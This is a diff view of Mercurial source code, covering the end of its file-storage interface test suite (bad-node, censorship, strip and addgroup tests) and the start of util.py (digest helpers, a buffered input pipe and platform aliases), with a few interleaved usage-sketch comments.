958 958 f, tr, node1, node0, nullid, 1, rawtext=fulltext1
959 959 )
960 960
961 961 with self.assertRaises(error.StorageError):
962 962 f.rawdata(node1)
963 963
964 964 with self.assertRaises(error.StorageError):
965 965 f.rawdata(node1)
966 966
967 967 def testbadnoderevisionread(self):
968 968 # Like above except we test read() first to isolate revision caching
969 969 # behavior.
970 970 f = self._makefilefn()
971 971
972 972 fulltext0 = b'foo\n' * 30
973 973 fulltext1 = fulltext0 + b'bar\n'
974 974
975 975 with self._maketransactionfn() as tr:
976 976 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
977 977 node1 = b'\xaa' * 20
978 978
979 979 self._addrawrevisionfn(
980 980 f, tr, node1, node0, nullid, 1, rawtext=fulltext1
981 981 )
982 982
983 983 with self.assertRaises(error.StorageError):
984 984 f.read(node1)
985 985
986 986 with self.assertRaises(error.StorageError):
987 987 f.read(node1)
988 988
989 989 def testbadnodedelta(self):
990 990 f = self._makefilefn()
991 991
992 992 fulltext0 = b'foo\n' * 31
993 993 fulltext1 = fulltext0 + b'bar\n'
994 994 fulltext2 = fulltext1 + b'baz\n'
995 995
996 996 with self._maketransactionfn() as tr:
997 997 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
998 998 node1 = b'\xaa' * 20
999 999
1000 1000 self._addrawrevisionfn(
1001 1001 f, tr, node1, node0, nullid, 1, rawtext=fulltext1
1002 1002 )
1003 1003
1004 1004 with self.assertRaises(error.StorageError):
1005 1005 f.read(node1)
1006 1006
1007 1007 node2 = storageutil.hashrevisionsha1(fulltext2, node1, nullid)
1008 1008
1009 1009 with self._maketransactionfn() as tr:
1010 1010 delta = mdiff.textdiff(fulltext1, fulltext2)
1011 1011 self._addrawrevisionfn(
1012 1012 f, tr, node2, node1, nullid, 2, delta=(1, delta)
1013 1013 )
1014 1014
1015 1015 self.assertEqual(len(f), 3)
1016 1016
1017 1017 # Assuming a delta is stored, we shouldn't need to validate node1 in
1018 1018 # order to retrieve node2.
1019 1019 self.assertEqual(f.read(node2), fulltext2)
1020 1020
1021 1021 def testcensored(self):
1022 1022 f = self._makefilefn()
1023 1023
1024 1024 stored1 = storageutil.packmeta({b'censored': b'tombstone',}, b'')
1025 1025
1026 1026 with self._maketransactionfn() as tr:
1027 1027 node0 = f.add(b'foo', None, tr, 0, nullid, nullid)
1028 1028
1029 1029 # The node value doesn't matter since we can't verify it.
1030 1030 node1 = b'\xbb' * 20
1031 1031
1032 1032 self._addrawrevisionfn(
1033 1033 f, tr, node1, node0, nullid, 1, stored1, censored=True
1034 1034 )
1035 1035
1036 1036 self.assertTrue(f.iscensored(1))
1037 1037
1038 1038 with self.assertRaises(error.CensoredNodeError):
1039 1039 f.revision(1)
1040 1040
1041 1041 with self.assertRaises(error.CensoredNodeError):
1042 1042 f.rawdata(1)
1043 1043
1044 1044 with self.assertRaises(error.CensoredNodeError):
1045 1045 f.read(1)
1046 1046
1047 1047 def testcensoredrawrevision(self):
1048 1048 # Like above, except we do the rawdata() request first to
1049 1049 # isolate revision caching behavior.
1050 1050
1051 1051 f = self._makefilefn()
1052 1052
1053 1053 stored1 = storageutil.packmeta({b'censored': b'tombstone',}, b'')
1054 1054
1055 1055 with self._maketransactionfn() as tr:
1056 1056 node0 = f.add(b'foo', None, tr, 0, nullid, nullid)
1057 1057
1058 1058 # The node value doesn't matter since we can't verify it.
1059 1059 node1 = b'\xbb' * 20
1060 1060
1061 1061 self._addrawrevisionfn(
1062 1062 f, tr, node1, node0, nullid, 1, stored1, censored=True
1063 1063 )
1064 1064
1065 1065 with self.assertRaises(error.CensoredNodeError):
1066 1066 f.rawdata(1)
1067 1067
1068 1068
1069 1069 class ifilemutationtests(basetestcase):
1070 1070 """Generic tests for the ifilemutation interface.
1071 1071
1072 1072 All file storage backends that support writing should conform to this
1073 1073 interface.
1074 1074
1075 1075 Use ``makeifilemutationtests()`` to create an instance of this type.
1076 1076 """
1077 1077
1078 1078 def testaddnoop(self):
1079 1079 f = self._makefilefn()
1080 1080 with self._maketransactionfn() as tr:
1081 1081 node0 = f.add(b'foo', None, tr, 0, nullid, nullid)
1082 1082 node1 = f.add(b'foo', None, tr, 0, nullid, nullid)
1083 1083 # Varying by linkrev shouldn't impact hash.
1084 1084 node2 = f.add(b'foo', None, tr, 1, nullid, nullid)
1085 1085
1086 1086 self.assertEqual(node1, node0)
1087 1087 self.assertEqual(node2, node0)
1088 1088 self.assertEqual(len(f), 1)
1089 1089
1090 1090 def testaddrevisionbadnode(self):
1091 1091 f = self._makefilefn()
1092 1092 with self._maketransactionfn() as tr:
1093 1093 # Adding a revision with bad node value fails.
1094 1094 with self.assertRaises(error.StorageError):
1095 1095 f.addrevision(b'foo', tr, 0, nullid, nullid, node=b'\x01' * 20)
1096 1096
1097 1097 def testaddrevisionunknownflag(self):
1098 1098 f = self._makefilefn()
1099 1099 with self._maketransactionfn() as tr:
1100 1100 for i in range(15, 0, -1):
1101 1101 if (1 << i) & ~repository.REVISION_FLAGS_KNOWN:
1102 1102 flags = 1 << i
1103 1103 break
1104 1104
1105 1105 with self.assertRaises(error.StorageError):
1106 1106 f.addrevision(b'foo', tr, 0, nullid, nullid, flags=flags)
1107 1107
1108 1108 def testaddgroupsimple(self):
1109 1109 f = self._makefilefn()
1110 1110
1111 1111 callbackargs = []
1112 1112
1113 1113 def cb(*args, **kwargs):
1114 1114 callbackargs.append((args, kwargs))
1115 1115
1116 1116 def linkmapper(node):
1117 1117 return 0
1118 1118
1119 1119 with self._maketransactionfn() as tr:
1120 1120 nodes = f.addgroup([], None, tr, addrevisioncb=cb)
1121 1121
1122 1122 self.assertEqual(nodes, [])
1123 1123 self.assertEqual(callbackargs, [])
1124 1124 self.assertEqual(len(f), 0)
1125 1125
1126 1126 fulltext0 = b'foo'
1127 1127 delta0 = mdiff.trivialdiffheader(len(fulltext0)) + fulltext0
1128 1128
1129 1129 with self._maketransactionfn() as tr:
1130 1130 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
1131 1131
1132 1132 f = self._makefilefn()
1133 1133
1134 1134 deltas = [
1135 1135 (node0, nullid, nullid, nullid, nullid, delta0, 0),
1136 1136 ]
1137 1137
1138 1138 with self._maketransactionfn() as tr:
1139 1139 nodes = f.addgroup(deltas, linkmapper, tr, addrevisioncb=cb)
1140 1140
1141 1141 self.assertEqual(
1142 1142 nodes,
1143 1143 [
1144 1144 b'\x49\xd8\xcb\xb1\x5c\xe2\x57\x92\x04\x47'
1145 1145 b'\x00\x6b\x46\x97\x8b\x7a\xf9\x80\xa9\x79'
1146 1146 ],
1147 1147 )
1148 1148
1149 1149 self.assertEqual(len(callbackargs), 1)
1150 1150 self.assertEqual(callbackargs[0][0][1], nodes[0])
1151 1151
1152 1152 self.assertEqual(list(f.revs()), [0])
1153 1153 self.assertEqual(f.rev(nodes[0]), 0)
1154 1154 self.assertEqual(f.node(0), nodes[0])
1155 1155
1156 1156 def testaddgroupmultiple(self):
1157 1157 f = self._makefilefn()
1158 1158
1159 1159 fulltexts = [
1160 1160 b'foo',
1161 1161 b'bar',
1162 1162 b'x' * 1024,
1163 1163 ]
1164 1164
1165 1165 nodes = []
1166 1166 with self._maketransactionfn() as tr:
1167 1167 for fulltext in fulltexts:
1168 1168 nodes.append(f.add(fulltext, None, tr, 0, nullid, nullid))
1169 1169
1170 1170 f = self._makefilefn()
1171 1171 deltas = []
1172 1172 for i, fulltext in enumerate(fulltexts):
1173 1173 delta = mdiff.trivialdiffheader(len(fulltext)) + fulltext
1174 1174
1175 1175 deltas.append((nodes[i], nullid, nullid, nullid, nullid, delta, 0))
1176 1176
1177 1177 with self._maketransactionfn() as tr:
1178 1178 self.assertEqual(f.addgroup(deltas, lambda x: 0, tr), nodes)
1179 1179
1180 1180 self.assertEqual(len(f), len(deltas))
1181 1181 self.assertEqual(list(f.revs()), [0, 1, 2])
1182 1182 self.assertEqual(f.rev(nodes[0]), 0)
1183 1183 self.assertEqual(f.rev(nodes[1]), 1)
1184 1184 self.assertEqual(f.rev(nodes[2]), 2)
1185 1185 self.assertEqual(f.node(0), nodes[0])
1186 1186 self.assertEqual(f.node(1), nodes[1])
1187 1187 self.assertEqual(f.node(2), nodes[2])
1188 1188
1189 1189 def testdeltaagainstcensored(self):
1190 1190 # Attempt to apply a delta made against a censored revision.
1191 1191 f = self._makefilefn()
1192 1192
1193 1193 stored1 = storageutil.packmeta({b'censored': b'tombstone',}, b'')
1194 1194
1195 1195 with self._maketransactionfn() as tr:
1196 1196 node0 = f.add(b'foo\n' * 30, None, tr, 0, nullid, nullid)
1197 1197
1198 1198 # The node value doesn't matter since we can't verify it.
1199 1199 node1 = b'\xbb' * 20
1200 1200
1201 1201 self._addrawrevisionfn(
1202 1202 f, tr, node1, node0, nullid, 1, stored1, censored=True
1203 1203 )
1204 1204
1205 1205 delta = mdiff.textdiff(b'bar\n' * 30, (b'bar\n' * 30) + b'baz\n')
1206 1206 deltas = [(b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0)]
1207 1207
1208 1208 with self._maketransactionfn() as tr:
1209 1209 with self.assertRaises(error.CensoredBaseError):
1210 1210 f.addgroup(deltas, lambda x: 0, tr)
1211 1211
1212 1212 def testcensorrevisionbasic(self):
1213 1213 f = self._makefilefn()
1214 1214
1215 1215 with self._maketransactionfn() as tr:
1216 1216 node0 = f.add(b'foo\n' * 30, None, tr, 0, nullid, nullid)
1217 1217 node1 = f.add(b'foo\n' * 31, None, tr, 1, node0, nullid)
1218 1218 node2 = f.add(b'foo\n' * 32, None, tr, 2, node1, nullid)
1219 1219
1220 1220 with self._maketransactionfn() as tr:
1221 1221 f.censorrevision(tr, node1)
1222 1222
1223 1223 self.assertEqual(len(f), 3)
1224 1224 self.assertEqual(list(f.revs()), [0, 1, 2])
1225 1225
1226 1226 self.assertEqual(f.read(node0), b'foo\n' * 30)
1227 1227 self.assertEqual(f.read(node2), b'foo\n' * 32)
1228 1228
1229 1229 with self.assertRaises(error.CensoredNodeError):
1230 1230 f.read(node1)
1231 1231
1232 1232 def testgetstrippointnoparents(self):
1233 1233 # N revisions where none have parents.
1234 1234 f = self._makefilefn()
1235 1235
1236 1236 with self._maketransactionfn() as tr:
1237 1237 for rev in range(10):
1238 1238 f.add(b'%d' % rev, None, tr, rev, nullid, nullid)
1239 1239
1240 1240 for rev in range(10):
1241 1241 self.assertEqual(f.getstrippoint(rev), (rev, set()))
1242 1242
1243 1243 def testgetstrippointlinear(self):
1244 1244 # N revisions in a linear chain.
1245 1245 f = self._makefilefn()
1246 1246
1247 1247 with self._maketransactionfn() as tr:
1248 1248 p1 = nullid
1249 1249
1250 1250 for rev in range(10):
1251 1251 f.add(b'%d' % rev, None, tr, rev, p1, nullid)
1252 1252
1253 1253 for rev in range(10):
1254 1254 self.assertEqual(f.getstrippoint(rev), (rev, set()))
1255 1255
1256 1256 def testgetstrippointmultipleheads(self):
1257 1257 f = self._makefilefn()
1258 1258
1259 1259 with self._maketransactionfn() as tr:
1260 1260 node0 = f.add(b'0', None, tr, 0, nullid, nullid)
1261 1261 node1 = f.add(b'1', None, tr, 1, node0, nullid)
1262 1262 f.add(b'2', None, tr, 2, node1, nullid)
1263 1263 f.add(b'3', None, tr, 3, node0, nullid)
1264 1264 f.add(b'4', None, tr, 4, node0, nullid)
1265 1265
1266 1266 for rev in range(5):
1267 1267 self.assertEqual(f.getstrippoint(rev), (rev, set()))
1268 1268
1269 1269 def testgetstrippointearlierlinkrevs(self):
1270 1270 f = self._makefilefn()
1271 1271
1272 1272 with self._maketransactionfn() as tr:
1273 1273 node0 = f.add(b'0', None, tr, 0, nullid, nullid)
1274 1274 f.add(b'1', None, tr, 10, node0, nullid)
1275 1275 f.add(b'2', None, tr, 5, node0, nullid)
1276 1276
1277 1277 self.assertEqual(f.getstrippoint(0), (0, set()))
1278 1278 self.assertEqual(f.getstrippoint(1), (1, set()))
1279 1279 self.assertEqual(f.getstrippoint(2), (1, set()))
1280 1280 self.assertEqual(f.getstrippoint(3), (1, set()))
1281 1281 self.assertEqual(f.getstrippoint(4), (1, set()))
1282 1282 self.assertEqual(f.getstrippoint(5), (1, set()))
1283 1283 self.assertEqual(f.getstrippoint(6), (1, {2}))
1284 1284 self.assertEqual(f.getstrippoint(7), (1, {2}))
1285 1285 self.assertEqual(f.getstrippoint(8), (1, {2}))
1286 1286 self.assertEqual(f.getstrippoint(9), (1, {2}))
1287 1287 self.assertEqual(f.getstrippoint(10), (1, {2}))
1288 1288 self.assertEqual(f.getstrippoint(11), (3, set()))
1289 1289
1290 1290 def teststripempty(self):
1291 1291 f = self._makefilefn()
1292 1292
1293 1293 with self._maketransactionfn() as tr:
1294 1294 f.strip(0, tr)
1295 1295
1296 1296 self.assertEqual(len(f), 0)
1297 1297
1298 1298 def teststripall(self):
1299 1299 f = self._makefilefn()
1300 1300
1301 1301 with self._maketransactionfn() as tr:
1302 1302 p1 = nullid
1303 1303 for rev in range(10):
1304 1304 p1 = f.add(b'%d' % rev, None, tr, rev, p1, nullid)
1305 1305
1306 1306 self.assertEqual(len(f), 10)
1307 1307
1308 1308 with self._maketransactionfn() as tr:
1309 1309 f.strip(0, tr)
1310 1310
1311 1311 self.assertEqual(len(f), 0)
1312 1312
1313 1313 def teststrippartial(self):
1314 1314 f = self._makefilefn()
1315 1315
1316 1316 with self._maketransactionfn() as tr:
1317 1317 f.add(b'0', None, tr, 0, nullid, nullid)
1318 1318 node1 = f.add(b'1', None, tr, 5, nullid, nullid)
1319 1319 node2 = f.add(b'2', None, tr, 10, nullid, nullid)
1320 1320
1321 1321 self.assertEqual(len(f), 3)
1322 1322
1323 1323 with self._maketransactionfn() as tr:
1324 1324 f.strip(11, tr)
1325 1325
1326 1326 self.assertEqual(len(f), 3)
1327 1327
1328 1328 with self._maketransactionfn() as tr:
1329 1329 f.strip(10, tr)
1330 1330
1331 1331 self.assertEqual(len(f), 2)
1332 1332
1333 1333 with self.assertRaises(error.LookupError):
1334 1334 f.rev(node2)
1335 1335
1336 1336 with self._maketransactionfn() as tr:
1337 1337 f.strip(6, tr)
1338 1338
1339 1339 self.assertEqual(len(f), 2)
1340 1340
1341 1341 with self._maketransactionfn() as tr:
1342 1342 f.strip(3, tr)
1343 1343
1344 1344 self.assertEqual(len(f), 1)
1345 1345
1346 1346 with self.assertRaises(error.LookupError):
1347 1347 f.rev(node1)
1348 1348
1349 1349
1350 1350 def makeifileindextests(makefilefn, maketransactionfn, addrawrevisionfn):
1351 1351 """Create a unittest.TestCase class suitable for testing file storage.
1352 1352
1353 1353 ``makefilefn`` is a callable which receives the test case as an
1354 1354 argument and returns an object implementing the ``ifilestorage`` interface.
1355 1355
1356 1356 ``maketransactionfn`` is a callable which receives the test case as an
1357 1357 argument and returns a transaction object.
1358 1358
1359 1359 ``addrawrevisionfn`` is a callable which receives arguments describing a
1360 1360 low-level revision to add. This callable allows the insertion of
1361 1361 potentially bad data into the store in order to facilitate testing.
1362 1362
1363 1363 Returns a type that is a ``unittest.TestCase`` that can be used for
1364 1364 testing the object implementing the file storage interface. Simply
1365 1365 assign the returned value to a module-level attribute and a test loader
1366 1366 should find and run it automatically.
1367 1367 """
1368 1368 d = {
1369 1369 r'_makefilefn': makefilefn,
1370 1370 r'_maketransactionfn': maketransactionfn,
1371 1371 r'_addrawrevisionfn': addrawrevisionfn,
1372 1372 }
1373 1373 return type(r'ifileindextests', (ifileindextests,), d)
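# A hedged usage sketch (the three factory names are hypothetical):
#   ifileindextestcase = makeifileindextests(
#       makefilefn, maketransactionfn, addrawrevisionfn)
# Binding the returned class to a module-level name is enough for a
# unittest loader to discover and run it.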
1374 1374
1375 1375
1376 1376 def makeifiledatatests(makefilefn, maketransactionfn, addrawrevisionfn):
1377 1377 d = {
1378 1378 r'_makefilefn': makefilefn,
1379 1379 r'_maketransactionfn': maketransactionfn,
1380 1380 r'_addrawrevisionfn': addrawrevisionfn,
1381 1381 }
1382 1382 return type(r'ifiledatatests', (ifiledatatests,), d)
1383 1383
1384 1384
1385 1385 def makeifilemutationtests(makefilefn, maketransactionfn, addrawrevisionfn):
1386 1386 d = {
1387 1387 r'_makefilefn': makefilefn,
1388 1388 r'_maketransactionfn': maketransactionfn,
1389 1389 r'_addrawrevisionfn': addrawrevisionfn,
1390 1390 }
1391 1391 return type(r'ifilemutationtests', (ifilemutationtests,), d)
@@ -1,3660 +1,3660
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import attr
38 38 from .pycompat import (
39 39 delattr,
40 40 getattr,
41 41 open,
42 42 setattr,
43 43 )
44 44 from hgdemandimport import tracing
45 45 from . import (
46 46 encoding,
47 47 error,
48 48 i18n,
49 49 node as nodemod,
50 50 policy,
51 51 pycompat,
52 52 urllibcompat,
53 53 )
54 54 from .utils import (
55 55 compression,
56 56 procutil,
57 57 stringutil,
58 58 )
59 59
60 60 rustdirs = policy.importrust(r'dirstate', r'Dirs')
61 61
62 62 base85 = policy.importmod(r'base85')
63 63 osutil = policy.importmod(r'osutil')
64 64 parsers = policy.importmod(r'parsers')
65 65
66 66 b85decode = base85.b85decode
67 67 b85encode = base85.b85encode
68 68
69 69 cookielib = pycompat.cookielib
70 70 httplib = pycompat.httplib
71 71 pickle = pycompat.pickle
72 72 safehasattr = pycompat.safehasattr
73 73 socketserver = pycompat.socketserver
74 74 bytesio = pycompat.bytesio
75 75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 76 stringio = bytesio
77 77 xmlrpclib = pycompat.xmlrpclib
78 78
79 79 httpserver = urllibcompat.httpserver
80 80 urlerr = urllibcompat.urlerr
81 81 urlreq = urllibcompat.urlreq
82 82
83 83 # workaround for win32mbcs
84 84 _filenamebytestr = pycompat.bytestr
85 85
86 86 if pycompat.iswindows:
87 87 from . import windows as platform
88 88 else:
89 89 from . import posix as platform
90 90
91 91 _ = i18n._
92 92
93 93 bindunixsocket = platform.bindunixsocket
94 94 cachestat = platform.cachestat
95 95 checkexec = platform.checkexec
96 96 checklink = platform.checklink
97 97 copymode = platform.copymode
98 98 expandglobs = platform.expandglobs
99 99 getfsmountpoint = platform.getfsmountpoint
100 100 getfstype = platform.getfstype
101 101 groupmembers = platform.groupmembers
102 102 groupname = platform.groupname
103 103 isexec = platform.isexec
104 104 isowner = platform.isowner
105 105 listdir = osutil.listdir
106 106 localpath = platform.localpath
107 107 lookupreg = platform.lookupreg
108 108 makedir = platform.makedir
109 109 nlinks = platform.nlinks
110 110 normpath = platform.normpath
111 111 normcase = platform.normcase
112 112 normcasespec = platform.normcasespec
113 113 normcasefallback = platform.normcasefallback
114 114 openhardlinks = platform.openhardlinks
115 115 oslink = platform.oslink
116 116 parsepatchoutput = platform.parsepatchoutput
117 117 pconvert = platform.pconvert
118 118 poll = platform.poll
119 119 posixfile = platform.posixfile
120 120 readlink = platform.readlink
121 121 rename = platform.rename
122 122 removedirs = platform.removedirs
123 123 samedevice = platform.samedevice
124 124 samefile = platform.samefile
125 125 samestat = platform.samestat
126 126 setflags = platform.setflags
127 127 split = platform.split
128 128 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
129 129 statisexec = platform.statisexec
130 130 statislink = platform.statislink
131 131 umask = platform.umask
132 132 unlink = platform.unlink
133 133 username = platform.username
134 134
135 135 # small compat layer
136 136 compengines = compression.compengines
137 137 SERVERROLE = compression.SERVERROLE
138 138 CLIENTROLE = compression.CLIENTROLE
139 139
140 140 try:
141 141 recvfds = osutil.recvfds
142 142 except AttributeError:
143 143 pass
144 144
145 145 # Python compatibility
146 146
147 147 _notset = object()
148 148
149 149
150 150 def bitsfrom(container):
151 151 bits = 0
152 152 for bit in container:
153 153 bits |= bit
154 154 return bits
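# A hedged sketch (the inputs are made up): bitsfrom([1, 2, 4]) == 7,
# i.e. the container's values are OR-ed together.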
155 155
156 156
157 157 # Python 2.6 still has deprecation warnings enabled by default. We do not
158 158 # want to display anything to the standard user, so detect if we are
159 159 # running tests and only use Python deprecation warnings in this case.
160 160 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
161 161 if _dowarn:
162 162 # explicitly unfilter our warning for python 2.7
163 163 #
164 164 # The option of setting PYTHONWARNINGS in the test runner was investigated.
165 165 # However, module name set through PYTHONWARNINGS was exactly matched, so
166 166 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
167 167 # makes the whole PYTHONWARNINGS thing useless for our use case.
168 168 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
169 169 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
170 170 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
171 171 if _dowarn and pycompat.ispy3:
172 172 # silence warning emitted by passing user string to re.sub()
173 173 warnings.filterwarnings(
174 174 r'ignore', r'bad escape', DeprecationWarning, r'mercurial'
175 175 )
176 176 warnings.filterwarnings(
177 177 r'ignore', r'invalid escape sequence', DeprecationWarning, r'mercurial'
178 178 )
179 179 # TODO: reinvent imp.is_frozen()
180 180 warnings.filterwarnings(
181 181 r'ignore',
182 182 r'the imp module is deprecated',
183 183 DeprecationWarning,
184 184 r'mercurial',
185 185 )
186 186
187 187
188 188 def nouideprecwarn(msg, version, stacklevel=1):
189 189 """Issue a Python-native deprecation warning
190 190 
191 191 This is a no-op outside of tests; use 'ui.deprecwarn' when possible.
192 192 """
193 193 if _dowarn:
194 194 msg += (
195 195 b"\n(compatibility will be dropped after Mercurial-%s,"
196 196 b" update your code.)"
197 197 ) % version
198 198 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
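# A hedged usage sketch (message and version are made up):
#   nouideprecwarn(b'use foo() instead', b'5.2', stacklevel=2)
# which appends the compatibility note and warns at the caller's frame.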
199 199
200 200
201 201 DIGESTS = {
202 202 b'md5': hashlib.md5,
203 203 b'sha1': hashlib.sha1,
204 204 b'sha512': hashlib.sha512,
205 205 }
206 206 # List of digest types from strongest to weakest
207 207 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
208 208
209 209 for k in DIGESTS_BY_STRENGTH:
210 210 assert k in DIGESTS
211 211
212 212
213 213 class digester(object):
214 214 """helper to compute digests.
215 215
216 216 This helper can be used to compute one or more digests given their name.
217 217
218 218 >>> d = digester([b'md5', b'sha1'])
219 219 >>> d.update(b'foo')
220 220 >>> [k for k in sorted(d)]
221 221 ['md5', 'sha1']
222 222 >>> d[b'md5']
223 223 'acbd18db4cc2f85cedef654fccc4a4d8'
224 224 >>> d[b'sha1']
225 225 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
226 226 >>> digester.preferred([b'md5', b'sha1'])
227 227 'sha1'
228 228 """
229 229
230 230 def __init__(self, digests, s=b''):
231 231 self._hashes = {}
232 232 for k in digests:
233 233 if k not in DIGESTS:
234 234 raise error.Abort(_(b'unknown digest type: %s') % k)
235 235 self._hashes[k] = DIGESTS[k]()
236 236 if s:
237 237 self.update(s)
238 238
239 239 def update(self, data):
240 240 for h in self._hashes.values():
241 241 h.update(data)
242 242
243 243 def __getitem__(self, key):
244 244 if key not in DIGESTS:
245 245 raise error.Abort(_(b'unknown digest type: %s') % key)
246 246 return nodemod.hex(self._hashes[key].digest())
247 247
248 248 def __iter__(self):
249 249 return iter(self._hashes)
250 250
251 251 @staticmethod
252 252 def preferred(supported):
253 253 """returns the strongest digest type in both supported and DIGESTS."""
254 254
255 255 for k in DIGESTS_BY_STRENGTH:
256 256 if k in supported:
257 257 return k
258 258 return None
259 259
260 260
261 261 class digestchecker(object):
262 262 """file handle wrapper that additionally checks content against a given
263 263 size and digests.
264 264
265 265 d = digestchecker(fh, size, {'md5': '...'})
266 266
267 267 When multiple digests are given, all of them are validated.
268 268 """
269 269
270 270 def __init__(self, fh, size, digests):
271 271 self._fh = fh
272 272 self._size = size
273 273 self._got = 0
274 274 self._digests = dict(digests)
275 275 self._digester = digester(self._digests.keys())
276 276
277 277 def read(self, length=-1):
278 278 content = self._fh.read(length)
279 279 self._digester.update(content)
280 280 self._got += len(content)
281 281 return content
282 282
283 283 def validate(self):
284 284 if self._size != self._got:
285 285 raise error.Abort(
286 286 _(b'size mismatch: expected %d, got %d')
287 287 % (self._size, self._got)
288 288 )
289 289 for k, v in self._digests.items():
290 290 if v != self._digester[k]:
291 291 # i18n: first parameter is a digest name
292 292 raise error.Abort(
293 293 _(b'%s mismatch: expected %s, got %s')
294 294 % (k, v, self._digester[k])
295 295 )
296 296
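# Editor's example (illustrative; file name and digest value are
# hypothetical): wrap a file handle, drain it, then check size and
# content in one validate() call.
with open('payload.bin', 'rb') as fh:
    checked = digestchecker(fh, size=1024, digests={b'sha1': b'<hex digest>'})
    while checked.read(4096):
        pass
    checked.validate()  # raises error.Abort on size or digest mismatch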
297 297
298 298 try:
299 299 buffer = buffer
300 300 except NameError:
301 301
302 302 def buffer(sliceable, offset=0, length=None):
303 303 if length is not None:
304 304 return memoryview(sliceable)[offset : offset + length]
305 305 return memoryview(sliceable)[offset:]
306 306
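# Editor's example (illustrative): on Python 3 the fallback builds a
# zero-copy memoryview slice instead of the Python 2 buffer type.
_view = buffer(b'abcdef', 2, 3)
assert bytes(_view) == b'cde'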
307 307
308 308 _chunksize = 4096
309 309
310 310
311 311 class bufferedinputpipe(object):
312 312 """a manually buffered input pipe
313 313
314 314 Python will not let us use buffered IO and lazy reading with 'polling' at
315 315 the same time. We cannot probe the buffer state and select will not detect
316 316 that data are ready to read if they are already buffered.
317 317
318 318 This class lets us work around that by implementing its own buffering
319 319 (allowing efficient readline) while offering a way to know if the buffer is
320 320 empty from the output (allowing collaboration of the buffer with polling).
321 321
322 322 This class lives in the 'util' module because it makes use of the 'os'
323 323 module from the python stdlib.
324 324 """
325 325
326 326 def __new__(cls, fh):
327 327 # If we receive a fileobjectproxy, we need to use a variation of this
328 328 # class that notifies observers about activity.
329 329 if isinstance(fh, fileobjectproxy):
330 330 cls = observedbufferedinputpipe
331 331
332 332 return super(bufferedinputpipe, cls).__new__(cls)
333 333
334 334 def __init__(self, input):
335 335 self._input = input
336 336 self._buffer = []
337 337 self._eof = False
338 338 self._lenbuf = 0
339 339
340 340 @property
341 341 def hasbuffer(self):
342 342 """True if any data is currently buffered
343 343
344 344 This will be used externally as a pre-step for polling IO. If there is
345 345 already data then no polling should be put in place."""
346 346 return bool(self._buffer)
347 347
348 348 @property
349 349 def closed(self):
350 350 return self._input.closed
351 351
352 352 def fileno(self):
353 353 return self._input.fileno()
354 354
355 355 def close(self):
356 356 return self._input.close()
357 357
358 358 def read(self, size):
359 359 while (not self._eof) and (self._lenbuf < size):
360 360 self._fillbuffer()
361 361 return self._frombuffer(size)
362 362
363 363 def unbufferedread(self, size):
364 364 if not self._eof and self._lenbuf == 0:
365 365 self._fillbuffer(max(size, _chunksize))
366 366 return self._frombuffer(min(self._lenbuf, size))
367 367
368 368 def readline(self, *args, **kwargs):
369 369 if len(self._buffer) > 1:
370 370 # this should not happen because both read and readline end with a
371 371 # _frombuffer call that collapses it.
372 372 self._buffer = [b''.join(self._buffer)]
373 373 self._lenbuf = len(self._buffer[0])
374 374 lfi = -1
375 375 if self._buffer:
376 376 lfi = self._buffer[-1].find(b'\n')
377 377 while (not self._eof) and lfi < 0:
378 378 self._fillbuffer()
379 379 if self._buffer:
380 380 lfi = self._buffer[-1].find(b'\n')
381 381 size = lfi + 1
382 382 if lfi < 0: # end of file
383 383 size = self._lenbuf
384 384 elif len(self._buffer) > 1:
385 385 # we need to take previous chunks into account
386 386 size += self._lenbuf - len(self._buffer[-1])
387 387 return self._frombuffer(size)
388 388
389 389 def _frombuffer(self, size):
390 390 """return at most 'size' data from the buffer
391 391
392 392 The data are removed from the buffer."""
393 393 if size == 0 or not self._buffer:
394 394 return b''
395 395 buf = self._buffer[0]
396 396 if len(self._buffer) > 1:
397 397 buf = b''.join(self._buffer)
398 398
399 399 data = buf[:size]
400 400 buf = buf[len(data) :]
401 401 if buf:
402 402 self._buffer = [buf]
403 403 self._lenbuf = len(buf)
404 404 else:
405 405 self._buffer = []
406 406 self._lenbuf = 0
407 407 return data
408 408
409 409 def _fillbuffer(self, size=_chunksize):
410 410 """read data to the buffer"""
411 411 data = os.read(self._input.fileno(), size)
412 412 if not data:
413 413 self._eof = True
414 414 else:
415 415 self._lenbuf += len(data)
416 416 self._buffer.append(data)
417 417
418 418 return data
419 419
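# Editor's example (illustrative): wrap the read end of a pipe so that
# buffered readline() can coexist with poll()-style readiness checks.
import os

_rfd, _wfd = os.pipe()
os.write(_wfd, b'a line\nmore')
_pipe = bufferedinputpipe(os.fdopen(_rfd, 'rb'))
assert _pipe.readline() == b'a line\n'
assert _pipe.hasbuffer  # b'more' is buffered already; skip polling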
420 420
421 421 def mmapread(fp):
422 422 try:
423 423 fd = getattr(fp, 'fileno', lambda: fp)()
424 424 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
